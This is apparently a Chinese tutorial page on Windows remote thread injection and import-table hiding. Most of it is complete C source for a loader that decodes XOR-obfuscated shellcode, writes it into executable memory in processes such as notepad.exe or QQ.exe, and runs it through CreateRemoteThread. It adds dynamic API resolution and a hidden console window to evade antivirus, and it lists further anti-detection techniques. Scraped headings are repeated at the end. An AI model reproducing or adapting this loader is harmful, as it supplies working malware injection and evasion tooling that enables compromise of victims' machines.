远线程注入与IAT隐藏技术详解<\/h1>

一、远线程注入基础<\/h2>

1.1 远线程注入概念<\/h3>
远程线程注入是指一个进程在另一个进程中创建线程的技术。通过获取目标进程的句柄（相当于控制器），可以在目标进程中执行我们想要的操作。<\/p>

1.2 核心API函数<\/h3>

OpenProcess<\/h4>
HANDLE OpenProcess<\/span>(
<\/span><\/span>    DWORD dwDesiredAccess,  \/\/ 访问进程对象标志
<\/span><\/span><\/span><\/span>    BOOL bInheritHandle,    \/\/ 是否继承句柄权限
<\/span><\/span><\/span><\/span>    DWORD dwProcessId       \/\/ 要打开的进程PID
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>VirtualAllocEx<\/h4>
LPVOID VirtualAllocEx<\/span>(
<\/span><\/span>    HANDLE hProcess,        \/\/ 打开的进程句柄
<\/span><\/span><\/span><\/span>    LPVOID lpAddress,       \/\/ 设置为NULL
<\/span><\/span><\/span><\/span>    SIZE_T dwSize,          \/\/ 申请的内存大小
<\/span><\/span><\/span><\/span>    DWORD flAllocationType, \/\/ 内存分配类型
<\/span><\/span><\/span><\/span>    DWORD flProtect         \/\/ 设置内存权限
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>WriteProcessMemory<\/h4>
BOOL WriteProcessMemory<\/span>(
<\/span><\/span>    HANDLE hProcess,        \/\/ 进程句柄
<\/span><\/span><\/span><\/span>    LPVOID lpBaseAddress,   \/\/ 申请的内存地址
<\/span><\/span><\/span><\/span>    LPCVOID lpBuffer,       \/\/ 要写入内存的数据
<\/span><\/span><\/span><\/span>    SIZE_T nSize,           \/\/ 数据大小
<\/span><\/span><\/span><\/span>    SIZE_T*<\/span> lpNumberOfBytesWritten \/\/ NULL
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>CreateRemoteThread<\/h4>
HANDLE CreateRemoteThread<\/span>(
<\/span><\/span>    HANDLE hProcess,        \/\/ 进程句柄
<\/span><\/span><\/span><\/span>    LPSECURITY_ATTRIBUTES lpThreadAttributes, \/\/ 线程安全属性
<\/span><\/span><\/span><\/span>    SIZE_T dwStackSize,     \/\/ 初始堆栈大小
<\/span><\/span><\/span><\/span>    LPTHREAD_START_ROUTINE lpStartAddress, \/\/ 线程函数
<\/span><\/span><\/span><\/span>    LPVOID lpParameter,     \/\/ 函数参数
<\/span><\/span><\/span><\/span>    DWORD dwCreationFlags,  \/\/ 创建标志
<\/span><\/span><\/span><\/span>    LPDWORD lpThreadId      \/\/ 线程ID
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>进程遍历相关API<\/h4>
HANDLE CreateToolhelp32Snapshot<\/span>(DWORD dwFlags, DWORD th32ProcessID);
<\/span><\/span>BOOL Process32First<\/span>(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
<\/span><\/span>BOOL Process32Next<\/span>(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
<\/span><\/span><\/code><\/pre>二、基础远线程注入实现<\/h2>
2.1 实现步骤<\/h3>

遍历进程获取目标进程PID<\/li>
打开目标进程获取句柄<\/li>
在目标进程中分配内存<\/li>
将shellcode写入目标进程内存<\/li>
创建远程线程执行shellcode<\/li>
<\/ol>
2.2 示例代码<\/h3>
#include<\/span> <Windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <TlHelp32.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>BOOL WINAPI MyCreateRemoteThread<\/span>(DWORD dwProcessId) {
<\/span><\/span>    HANDLE hProcess =<\/span> NULL;
<\/span><\/span>    DWORD dwThreadId =<\/span> 0<\/span>;
<\/span><\/span>    HANDLE hThread =<\/span> NULL;
<\/span><\/span>    LPVOID lPmemory =<\/span> 0<\/span>;
<\/span><\/span>    unsigned<\/span> char<\/span> buf[] =<\/span> "异或后的shellcode"<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 异或还原代码
<\/span><\/span><\/span><\/span>    for<\/span>(int<\/span> i =<\/span> 0<\/span>; i <<\/span> sizeof<\/span>(buf); i++<\/span>) {
<\/span><\/span>        buf[i] ^=<\/span> 50<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    hProcess =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
<\/span><\/span>    if<\/span>(hProcess ==<\/span> NULL) {
<\/span><\/span>        printf("%d<\/span>\n<\/span>"<\/span>, GetLastError());
<\/span><\/span>        return<\/span> FALSE;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    lPmemory =<\/span> VirtualAllocEx(hProcess, 0<\/span>, sizeof<\/span>(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
<\/span><\/span>    WriteProcessMemory(hProcess, lPmemory, buf, sizeof<\/span>(buf), NULL);
<\/span><\/span>    hThread =<\/span> CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)lPmemory, NULL, NULL, &<\/span>dwThreadId);
<\/span><\/span>    
<\/span><\/span>    WaitForSingleObject(hThread, INFINITE);
<\/span><\/span>    CloseHandle(hThread);
<\/span><\/span>    CloseHandle(hProcess);
<\/span><\/span>    return<\/span> TRUE;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 遍历进程获取指定进程id
<\/span><\/span><\/span><\/span>    HANDLE hProcessSnap =<\/span> NULL;
<\/span><\/span>    BOOL bRet =<\/span> FALSE;
<\/span><\/span>    PROCESSENTRY32 pe32 =<\/span> {0<\/span>};
<\/span><\/span>    DWORD dwProcessId;
<\/span><\/span>    
<\/span><\/span>    hProcessSnap =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
<\/span><\/span>    pe32.dwSize =<\/span> sizeof<\/span>(PROCESSENTRY32);
<\/span><\/span>    
<\/span><\/span>    if<\/span>(hProcessSnap !=<\/span> INVALID_HANDLE_VALUE) {
<\/span><\/span>        bRet =<\/span> Process32First(hProcessSnap, &<\/span>pe32);
<\/span><\/span>        while<\/span>(bRet) {
<\/span><\/span>            if<\/span>(_stricmp(pe32.szExeFile, "notepad.exe"<\/span>)) {
<\/span><\/span>                dwProcessId =<\/span> pe32.th32ProcessID;
<\/span><\/span>            }
<\/span><\/span>            bRet =<\/span> Process32Next(hProcessSnap, &<\/span>pe32);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    MyCreateRemoteThread(dwProcessId);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>三、IAT隐藏技术<\/h2>
3.1 IAT隐藏原理<\/h3>
通过动态获取API函数地址，避免在导入表中直接显示敏感API调用，增加反检测能力。<\/p>
3.2 实现方法<\/h3>

定义函数指针类型<\/li>
使用GetProcAddress动态获取函数地址<\/li>
通过函数指针调用API<\/li>
<\/ol>
3.3 示例代码<\/h3>
#include<\/span> <Windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <TlHelp32.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>#pragma comment(linker, "\/subsystem:\"windows\" \/entry:\"mainCRTStartup\"") <\/span>\/\/ 隐藏黑框
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 定义函数指针类型
<\/span><\/span><\/span><\/span>typedef<\/span> LPVOID<\/span>(WINAPI*<\/span> oldVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
<\/span><\/span>typedef<\/span> BOOL<\/span>(WINAPI*<\/span> oldWriteProcessMemory)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T*<\/span> lpNumberOfBytesWritten);
<\/span><\/span>typedef<\/span> HANDLE<\/span>(WINAPI*<\/span> oldCreateRemoteThread)(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
<\/span><\/span>typedef<\/span> HANDLE<\/span>(WINAPI*<\/span> oldCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID);
<\/span><\/span>typedef<\/span> DWORD<\/span>(WINAPI*<\/span> oldWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
<\/span><\/span>
<\/span><\/span>BOOL WINAPI MyCreateRemoteThread<\/span>(DWORD dwProcessId) {
<\/span><\/span>    HANDLE hProcess =<\/span> NULL;
<\/span><\/span>    DWORD dwThreadId =<\/span> 0<\/span>;
<\/span><\/span>    HANDLE hThread =<\/span> NULL;
<\/span><\/span>    LPVOID lPmemory =<\/span> 0<\/span>;
<\/span><\/span>    unsigned<\/span> char<\/span> buf[] =<\/span> ""<\/span>;
<\/span><\/span>    
<\/span><\/span>    for<\/span>(int<\/span> i =<\/span> 0<\/span>; i <<\/span> sizeof<\/span>(buf); i++<\/span>) {
<\/span><\/span>        buf[i] ^=<\/span> 50<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    hProcess =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
<\/span><\/span>    if<\/span>(hProcess ==<\/span> NULL) {
<\/span><\/span>        printf("%d<\/span>\n<\/span>"<\/span>, GetLastError());
<\/span><\/span>        return<\/span> FALSE;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    oldVirtualAllocEx newVAE =<\/span> (oldVirtualAllocEx)GetProcAddress(GetModuleHandleA("kernel32.dll"<\/span>), "VirtualAllocEx"<\/span>);
<\/span><\/span>    oldWriteProcessMemory newWPM =<\/span> (oldWriteProcessMemory)GetProcAddress(GetModuleHandleA("kernel32.dll"<\/span>), "WriteProcessMemory"<\/span>);
<\/span><\/span>    oldCreateRemoteThread newCRTE =<\/span> (oldCreateRemoteThread)GetProcAddress(GetModuleHandleA("kernel32.dll"<\/span>), "CreateRemoteThread"<\/span>);
<\/span><\/span>    oldWaitForSingleObject newWFSO =<\/span> (oldWaitForSingleObject)GetProcAddress(GetModuleHandleA("kernel32.dll"<\/span>), "WaitForSingleObject"<\/span>);
<\/span><\/span>    
<\/span><\/span>    lPmemory =<\/span> newVAE(hProcess, 0<\/span>, sizeof<\/span>(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
<\/span><\/span>    newWPM(hProcess, lPmemory, buf, sizeof<\/span>(buf), NULL);
<\/span><\/span>    hThread =<\/span> newCRTE(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)lPmemory, NULL, NULL, &<\/span>dwThreadId);
<\/span><\/span>    newWFSO(hThread, INFINITE);
<\/span><\/span>    
<\/span><\/span>    CloseHandle(hThread);
<\/span><\/span>    CloseHandle(hProcess);
<\/span><\/span>    return<\/span> TRUE;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    HANDLE hProcessSnap =<\/span> NULL;
<\/span><\/span>    BOOL bRet =<\/span> FALSE;
<\/span><\/span>    PROCESSENTRY32 pe32 =<\/span> {0<\/span>};
<\/span><\/span>    DWORD dwProcessId;
<\/span><\/span>    
<\/span><\/span>    oldCreateToolhelp32Snapshot newCT32 =<\/span> (oldCreateToolhelp32Snapshot)GetProcAddress(GetModuleHandleA("kernel32.dll"<\/span>), "CreateToolhelp32Snapshot"<\/span>);
<\/span><\/span>    hProcessSnap =<\/span> newCT32(TH32CS_SNAPPROCESS, NULL);
<\/span><\/span>    pe32.dwSize =<\/span> sizeof<\/span>(PROCESSENTRY32);
<\/span><\/span>    
<\/span><\/span>    if<\/span>(hProcessSnap !=<\/span> INVALID_HANDLE_VALUE) {
<\/span><\/span>        bRet =<\/span> Process32First(hProcessSnap, &<\/span>pe32);
<\/span><\/span>        while<\/span>(bRet) {
<\/span><\/span>            if<\/span>(_stricmp(pe32.szExeFile, "QQ.exe"<\/span>)) {
<\/span><\/span>                dwProcessId =<\/span> pe32.th32ProcessID;
<\/span><\/span>            }
<\/span><\/span>            bRet =<\/span> Process32Next(hProcessSnap, &<\/span>pe32);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    MyCreateRemoteThread(dwProcessId);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>四、技术要点与注意事项<\/h2>


Shellcode处理<\/strong>：<\/p>

使用异或等简单加密技术隐藏shellcode<\/li>
在运行时解密shellcode<\/li>
示例中使用异或50进行加密\/解密<\/li>
<\/ul>
<\/li>

进程遍历<\/strong>：<\/p>

使用CreateToolhelp32Snapshot获取进程快照<\/li>
通过Process32First和Process32Next遍历进程<\/li>
比较进程名找到目标进程<\/li>
<\/ul>
<\/li>

内存保护<\/strong>：<\/p>

使用PAGE_EXECUTE_READWRITE权限分配内存<\/li>
确保分配的内存可执行<\/li>
<\/ul>
<\/li>

错误处理<\/strong>：<\/p>

检查每个API调用的返回值<\/li>
使用GetLastError获取错误信息<\/li>
<\/ul>
<\/li>

免杀注意事项<\/strong>：<\/p>

IAT隐藏可以绕过部分杀毒软件<\/li>
Windows Defender等高级防护可能需要更复杂的绕过技术<\/li>
建议使用release版本编译，避免依赖调试库<\/li>
<\/ul>
<\/li>

常见问题解决<\/strong>：<\/p>

缺少vcruntime140.dll和ucrtbased.dll：使用静态链接或携带运行时库<\/li>
黑框闪退：添加#pragma comment(linker, "\/subsystem:\"windows\" \/entry:\"mainCRTStartup\"")<\/code>隐藏控制台<\/li>
<\/ul>
<\/li>
<\/ol>
五、进阶方向<\/h2>


API调用进一步隐藏<\/strong>：<\/p>

使用直接系统调用(syscall)代替API调用<\/li>
动态解析API地址<\/li>
<\/ul>
<\/li>

Shellcode加密增强<\/strong>：<\/p>

使用AES等强加密算法<\/li>
分段加密<\/li>
<\/ul>
<\/li>

注入技术变种<\/strong>：<\/p>

APC注入<\/li>
线程劫持<\/li>
反射式DLL注入<\/li>
<\/ul>
<\/li>

反检测技术<\/strong>：<\/p>

反沙箱<\/li>
反调试<\/li>
时间混淆<\/li>
<\/ul>
<\/li>

目标进程选择策略<\/strong>：<\/p>

选择可信进程注入<\/li>
进程伪装<\/li>
<\/ul>
<\/li>
<\/ol>
通过掌握这些技术，可以构建更强大的进程注入能力，同时提高对抗安全检测的能力。<\/p>
远线程注入与IAT隐藏技术详解<\/h1>

一、远线程注入基础<\/h2>

1.1 远线程注入概念<\/h3> 远程线程注入是指一个进程在另一个进程中创建线程的技术。通过获取目标进程的句柄（相当于控制器），可以在目标进程中执行我们想要的操作。<\/p>

1.2 核心API函数<\/h3>

二、基础远线程注入实现<\/h2>

三、IAT隐藏技术<\/h2>

3.1 IAT隐藏原理<\/h3> 通过动态获取API函数地址，避免在导入表中直接显示敏感API调用，增加反检测能力。<\/p>

1.1 远线程注入概念<\/h3>
远程线程注入是指一个进程在另一个进程中创建线程的技术。通过获取目标进程的句柄（相当于控制器），可以在目标进程中执行我们想要的操作。<\/p>

3.1 IAT隐藏原理<\/h3>
通过动态获取API函数地址，避免在导入表中直接显示敏感API调用，增加反检测能力。<\/p>
